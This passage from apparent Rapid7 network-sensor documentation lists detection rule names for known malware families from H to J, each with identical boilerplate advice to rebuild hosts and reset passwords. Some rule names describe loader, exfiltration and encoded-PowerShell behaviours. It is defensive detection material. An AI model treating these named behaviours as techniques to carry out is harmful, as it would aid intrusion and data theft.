This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE H1N1 Loader CnC Beacon M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE HabitsRAT Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE hacker87 checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hacking Team Android Implant Exfiltration

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hacking Team Elite Windows Implant Exfiltration

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hacking Team Implant Exfiltration

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hacking Team Scout Windows Implant Exfiltration

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HackTool.Linux.SSHBRUTE.A Haiduc Initial Compromise C2 POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hades APT Downloader Attempting to Retrieve Stage 2 Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hangover Campaign Keylogger 2 checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hangover Campaign Keylogger Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Harvester Group Downloader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Havex RAT CnC Server Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Havex RAT CnC Server Response HTML Tag

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HAWKBALL CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HAWKBALL CnC Initial Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HAWKBALL CnC Sending System Information

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Haxdoor Reporting User Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Haxdoor Reporting User Activity 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HB_Banker16 Get

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HiddenTears Ransomware Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Higaisa CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Higaisa CnC (ipconfig)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Higasia CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HighTide trojan Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hiloti loader installed successfully request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hiloti loader requesting payload URL

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hiloti/Mufanom Downloader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hitpop.AG/Pophot.az HTTP Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hoax.Win32.BadJoke/DownLoader1.57593 Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HompesA Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTA.BabyShark Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTA.BabyShark HTTP Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTML/Xbash Hex Encoded PowerShell Args Inbound - Stage 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTML/Xbash Hex Encoded PS WebClient Object Inbound - Stage 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTML/Xbash Hex Encoded WScript.Shell Inbound - Stage 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTP Andromeda File Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTP Connection To Known Sinkhole Domain sinkdns.org

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTPCore CnC Tasking File

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTPCore CnC Task Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTPCore CnC Task Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTP Request for Possible ELF/LiLocked Ransomware Note

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE HTTP Request to a *.pw domain with direct request/fake browser (multiple families flowbit set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTP Request to a *.su domain with direct request/fakebrowser (multiple families flowbit set)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTPTool User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hupigon.DF Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hupigon URL Infection Checkin Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hupigon User Agent Detected (??)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hupigon User Agent Detected (RAV1.23)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hupigon User Agent Detected (VIP2007)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HYDSEVEN VBS CnC Host Information Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IcedID CnC Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IcedID CnC Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IcedID CnC Domain in SSL/TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Encrypted Channel - T1573

ET MALWARE IcedID CnC Domain in SSL/TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Encrypted Channel - T1573

ET MALWARE IcedID CnC Domain in SSL/TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Encrypted Channel - T1573

ET MALWARE IcedID/Emotet Certificate Observed M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IcedID Observed Domain (loadfreeman .casa in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IcedID WebSocket Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ICEFOG JAVAFOG JAR checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ICEFOG-P Variant CnC Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ICEFOG-P Variant CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IceRat Backdoor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IceRat CnC Acitivty M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE iebar Spyware User Agent (iebar)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IIStealer Inbound Exfil Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IIStealer Inbound Exfil Request M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Illusion Bot (Lussilon) Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IMDDOS Botnet User-Agent IAMDDOS

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IMDDOS Botnet User-Agent kav

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IMDDOS Botnet User-Agent STORMDDOS

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IMDDOS Botnet User-Agent YTDDOS

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Inbound JasperLoader Using Array Push Obfuscation

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Inbound MonetizeUs/LNKR Struct

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Inbound PowerShell Executing Base64 Decoded VBE from Temp 2018-11-29

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Inbound PowerShell Saving Base64 Decoded Payload to Temp M1 2018-11-29

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Inbound PowerShell Saving Base64 Decoded Payload to Temp M2 2018-11-29

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Inception APT malware

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Incorrectly formatted User-Agent string (dashes instead of semicolons) Likely Hostile

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IndigoZebra APT BoxCaon DropBox Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IndigoZebra APT xCaon/Textpadx Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE indux.php check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE InfoBot Sending LAN Details

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE InfoBot Sending Machine Details

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Infostealer.Bancos ProxyChanger Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Infostealer.Banprox Proxy.pac Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Infostealer.Jackpos Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Infostealer.Jackpos Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Infostealer.Mysayad Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Infostealer.Mysayad Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Instagram Like Bot (like4u) CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Instagram Like Bot (like4u) CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Internet Protection FakeAV checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IOS.Oneclickfraud HTTP Host

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IP Grabber CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IrcBot Downloading .old

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IrcBot Fantasy Name Gen

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ironhalo CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Iron/Maktub Locker Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE ISMAgent CnC Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ISRStealer Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IsSpace/Zacom Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ixeshe/Mecklow Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ixeshe/Mecklow Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IXWARE Stealer CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JackPOS XOR Encoded HTTP Client Body (key AA)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jadtree Downloader rar

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jaff Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Jaff Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

